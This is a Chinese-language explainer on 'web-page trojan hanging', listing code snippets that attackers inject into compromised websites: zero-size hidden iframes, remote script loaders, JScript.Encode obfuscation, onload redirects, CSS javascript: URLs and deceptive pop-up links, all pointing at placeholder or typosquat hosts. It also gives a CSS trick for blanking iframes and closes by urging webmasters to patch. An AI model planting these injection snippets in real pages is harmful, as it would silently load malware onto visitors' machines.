(1)iframe 框架掛馬
在網(wǎng)頁上增加一行掛馬的程序,例如:
<iframe src=http://www.xxx.com/xxx.html width=0 height=0></iframe>
這種嵌入是的掛馬非常常見,在Google中搜索發(fā)現(xiàn)的可能還有木馬的網(wǎng)頁,一般都是被這種方式掛馬。這行語句就是在網(wǎng)頁打開的時候,同時打開另外一個網(wǎng)頁,當(dāng)然這個網(wǎng)頁可能包含大量的木馬,也可能僅僅是為了騙取流量。
如果我們的網(wǎng)頁不使用iframe,我們可以屏蔽iframe屬性,這樣,即使網(wǎng)頁被iframe掛馬,也不會傷害到訪問網(wǎng)站的用戶。
【原理】:
IE5及其以后版本支持在CSS中使用expression,用來把CSS屬性和JavaScript腳本關(guān)聯(lián)起來,這里的CSS屬性可以是元素固有的屬性,也可以是自定義屬性。
我們在網(wǎng)頁中增加如下的代碼即可屏蔽iframe屬性:
<style type=”text/css”>
iframe{a:expression(this.src=’about:blank’,this.outerHTML=”);}
</style>
iframe 也可以采用加密的方式掛馬,例如下面的代碼:
<iframe src=http://google-analitecs.com/in.cgi????? width=1 height=1></iframe>
(2)script 掛馬
通過script的調(diào)用來掛馬,可以掛直接的html文件,也可以掛js文件,可以明文掛馬,為了躲避追查,也有加密掛馬的形式,形式各異,千差萬別,主要方式如下:
<script src=http://%11%11%11%11%11%11%11></script>
這是一個加密的掛馬語句;
2.1 htm文件掛馬:
通過上傳一個木馬文件(x.htm)掛馬,代碼如下:
document.write(“<div style=’display:none’>”)
document.write(“<iframe src=x.htm width=0 height=0></iframe>”)
document.write(“</div>”)
htm 掛馬代碼:
<script src=x.htm></script>
2.2 js文件掛馬
通過上傳一個木馬文件(x.js)掛馬,代碼如下:
document.write(“<iframe width=’0′ height=’0′ src=’http://xxx.com/xxx.htm’></iframe>”);
JS掛馬代碼:
<script language=javascript src=x.js></script>
當(dāng)然也可以掛互聯(lián)網(wǎng)上任何一臺機(jī)器的x.js文件;
2.3 js變形加密
<SCRIPT language=”JScript.Encode” src=http://www.xxx.com/x.x></script>
(3)圖片偽裝掛馬
隨著防毒技術(shù)的發(fā)展,圖片木馬技術(shù)逃避殺毒監(jiān)視的新技術(shù),攻擊者將類似:http://www.xxx.com/x.htm中的木馬代碼植入到x.gif圖片文
件中,這些嵌入代碼的圖片都可以用工具生成。圖片木馬生成后,再利用代碼調(diào)用執(zhí)行,是比較新穎的一種掛馬隱蔽方法,實例代碼如:
<html>
<iframe src=”http://www.x.com/x.htm” height=0 width=0></iframe>
<img src=”http://www.x.com/x.jpg”></center>
</html>
當(dāng)用戶打開http://www.x.com/x.htm是,顯示給用戶的是http://www.x.com/x.jpg,而http://www.x.com/x.htm網(wǎng)頁代碼也隨之運(yùn)行。
(4)其它的掛馬方式
4.1 body掛馬
<body onload=”window.location=’http://xxx.com/xxx.htm’;”></body>
也可以在css的body中掛馬
body {
background-image: url(‘javascript:document.write(“<script src=http://www.xxx.com/x.js></script>”)’)}
4.2 隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML +
‘\r\n<iframe src=”http://www.xxx.com/xxx.htm/”></iframe>’;
4.3 java的open函數(shù)掛馬
直接調(diào)用:
<SCRIPT language=javascript>
window.open (“x.htm”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1″);
</script>
欺騙調(diào)用:
<a href=”http://www.a.com(迷惑連接地址,顯示這個地址指向木馬地址)” onMouseOver=”www_a_com(); return true;”> 頁面要顯示的內(nèi)容 </a>
<SCRIPT Language=”JavaScript”>
function www_a_com ()
{
var url=”網(wǎng)馬地址”;
open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,w
idth=800,height=600,left=10,top=10″);
}
</SCRIPT>
4.4 偽裝調(diào)用:
<frameset rows=”444,0″ cols=”*”>
<frame src=”a.htm” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″>
<frame src=”b.htm” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″>
</frameset>
形形色色的網(wǎng)頁掛馬,代碼都十分簡單,所以,互聯(lián)網(wǎng)木馬想要傳播,就會不停的開發(fā)新的掛馬方式,不停的加密隱藏自己,這樣才能逃過各種安全軟件的眼睛。其實,看看上文,很多語句都是編程常用的代碼,只是使用的目的不一樣罷了,了解了網(wǎng)頁掛馬的原理和方法,再防范網(wǎng)頁掛馬就容易多了。
帶木馬的網(wǎng)頁主要包括兩種類型:一種自己本身就是木馬網(wǎng)站,所有的頁面都有木馬,另一種是正常的網(wǎng)站,由于管理不善,被掛馬,成為木馬網(wǎng)站的一個中轉(zhuǎn)站,看看google中這樣的網(wǎng)站何其多,可能很多站長現(xiàn)在還不知道,呵呵,多學(xué)習(xí)學(xué)習(xí)吧,站長可不是那么好當(dāng)?shù)摹?/P>
不過,僅僅有了網(wǎng)絡(luò)掛馬的代碼,也不一定一定能傳播木馬,只要我們加強(qiáng)防范,不讓我們的網(wǎng)頁被 掛馬,甚至,即使被掛馬了,打開了木馬網(wǎng)頁,我們的系統(tǒng)沒有漏洞,木馬網(wǎng)頁也同樣不能發(fā)揮作用的。所以,最重要的安全防范方式就是定期給系統(tǒng)打補(bǔ)丁,幾乎 所有的木馬網(wǎng)頁都無法發(fā)揮作用了。